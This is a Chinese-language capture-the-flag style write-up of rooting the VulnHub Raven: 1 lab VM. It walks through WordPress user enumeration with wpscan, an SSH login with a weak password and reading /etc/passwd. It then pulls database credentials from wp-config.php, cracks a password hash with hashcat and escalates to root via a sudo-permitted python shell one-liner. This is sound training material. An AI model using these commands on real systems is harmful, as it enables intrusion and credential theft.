[資訊安全] VulnHub – Raven: 1 Write-up

Photo by Christopher Burns on Unsplash

上回結束掉 Matrix 系列,這回就進入到 Raven,沒意外的話應該是有望在 1/23 農曆年之前解完該系列,該系列在今天發文僅有兩題,而解系列的第一題 Raven: 1 也只花了半天的時間,整體還算順暢,並沒有卡太久得地方,也許是因為熟練度提升,思路知道該怎麼鑽了,又或者是題目難度其實沒有那麼難,現在也有點說不準了,總之有興趣的就來看看解題紀錄唄。

目錄

環境設定

Raven: 1 靶機下載: https://www.vulnhub.com/entry/raven-1,256/
解壓縮之後是一個 ova 檔案,同樣直接餵給 VMWare 吃,就可以完成佈署,但在察看 80 Port 的服務時,發現有許多找不到路徑的問題,其中部分路徑都是在 raven.local 底下,所以需要設定 hosts 檔案,若是使用 Windows 環境,Hosts 的路徑在 C:\Windows\System32\drivers\etc 之下,自行加入 192.168.232.130 raven.local 即可。

尋找靶機

透過 nmap -p- 192.168.232.1/24 把靶機找出來,抓到靶機 IP 為 192.168.232.130,並且服務上面有 22、80、111 Ports。

Raven: 1 Port Scan
  • 這邊使用參數 -p- 是掃描並列出 TCP 的所有執行中的 Ports。

服務探勘

80 Port

看上去是一個 CMS 服務,並在 /raven.local/wordpress 發現是 wordpress 4.8.7,嘗試尋找有沒有已知弱點,據我所知,Wordpress 能夠有效利用的弱點並不多,只有耳聞 WordPress 的主題設計不良,或是附加外掛所而造成漏洞而已,先是尋找目前主題 twenty seventeen 的資訊,在嘗試看看是否安裝外掛,接著在文章中找到以下內容。

Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.

還一度以為是要用 XSS 然後釣出管理者的 Cookie,但基本上都有 HttpOnly,可行性並不高,直到使用工具 wpscan,指令 wpscan --url http://raven.local/wordpress/ -evt -eu 得到以下訊息。

  • -e = –enumerate
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://raven.local/wordpress/
[+] Started: Mon Jan 20 11:01:27 2020

Interesting Finding(s):

[+] http://raven.local/wordpress/
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://raven.local/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://raven.local/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://raven.local/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://raven.local/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.7</generator>
 |  - http://raven.local/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.7</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://raven.local/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://raven.local/wordpress/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://raven.local/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.7
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://raven.local/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.7, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] michael
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://raven.local/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&amp;page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] steven
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

除了可以 DDOS 的洞,沒什麼可以用來達成滲透的,但由於有使用 -eu 參數,有將使用者成功列舉出來,發現帳戶 michaelsteven,嘗使用於後台以弱密碼登入失敗。

22 Port

由於拿到帳號名稱,當然要各種嘗試,接著在 ssh 上登入成功,是一組 michael/michael 的弱密碼,藉此拿到 Shell。

Raven: 1 Login ssh success.

為取得更多資訊,有做以下的嘗試與資料蒐集。

  1. whoami
  2. cat /etc/passwd
  3. uname -a
  4. history
  5. sudo -i(Failed: Not in sudoers)
  6. cat /etc/sudoers(Failed: Permission denied)

取得 Shell 接著使用一貫手法,到 /tmp 下提權,但網路上沒什麼 exploit 可以用,感覺上應該是條死路,還是嘗試用了 overlayfs 這包進行提權,顯然是失敗的。

方向轉到網頁服務上,既然有 wordpress,必定有資料庫,在路徑 /var/www/html/wordpress/wp-config.php 中發現資料庫帳號及密碼,而且使用者是 root

Find Raven: 1 DB Data.

接著直接使用 mysql -u root -p 進行登入,接著想說以 mysqlroot 權限執行 Bash 能提權,真的是異想天開,在此卡了一段時間,隨後想說就把 DB 上的機密資料道出來看看好了。

show databases;
use wordpress;
show tables;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | [email protected] |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | [email protected]  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+

得到 steven Hash 後的密碼,但這密文的規則,由於經驗不足還真的不知道是什麼東西,藉由工具 Hash-Analyzer 得到以下結果。

現在就是要針對 MD5 WordPress 破密了,先是使用線上服務 cmd5 進行破解,然後竟然要花錢,這是不是官商勾結阿!!!

隨後載 hashcat 來用,我想這也是出題者希望的做法吧,也藉此練習 hashcat 的用法,結果發現網路上有一篇針對 WordPress Hash 的破解文章「Cracking WordPress Passwords with Hashcat」完全沒練到,只是把指令複製貼上。

echo "$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/" > targer_hash.txt
hashcat -O -m 400 -a 0 target_hash.txt rockyou.txt --force

最後 hashcat 得到的結果為:

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 2 secs

- Device #1: autotuned kernel-accel to 512
- Device #1: autotuned kernel-loops to 512
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/:pink84

Get Root

透過 ssh 連接,這邊發現一個坑,使用 ssh [email protected]ssh [email protected] 的狀態是不一樣的,在 localhost 下,使用 sudo -l 會得不到資訊,在這之前有同事提過 Linux 環境的網卡 localhost127.0.0.1 指向的網卡是不同張。

透過 sudo -l 得到的資訊如下。

$ sudo -l
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python

透過觀察 (ALL) NOPASSWD: /usr/bin/python 可以知道,可以直接透過 root 權限開啟 python,藉此拿到 root 的 shell,指令如下。

sudo python -c "import os; os.system('/bin/bash')"

隨後就取得 root 了。

[email protected]:~# cat flag4.txt
______
| ___ \
| |_/ /__ ___   _____ _ __
|    // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V /  __/ | | |
\_| \_\__,_| \_/ \___|_| |_|

flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io

學習重點

  1. w p s c a n 使用方法。
  2. 情報蒐集方向,取得 Shell 後,執意的只想提權,應該嘗試找出更多可能攻擊路線。
  3. h a s h c a t 使用方法。
  4. l o c a l h o s t、1 2 7 . 0 . 0 . 1 的連線方式並不相同。

發佈留言

這個網站採用 Akismet 服務減少垃圾留言。進一步瞭解 Akismet 如何處理網站訪客的留言資料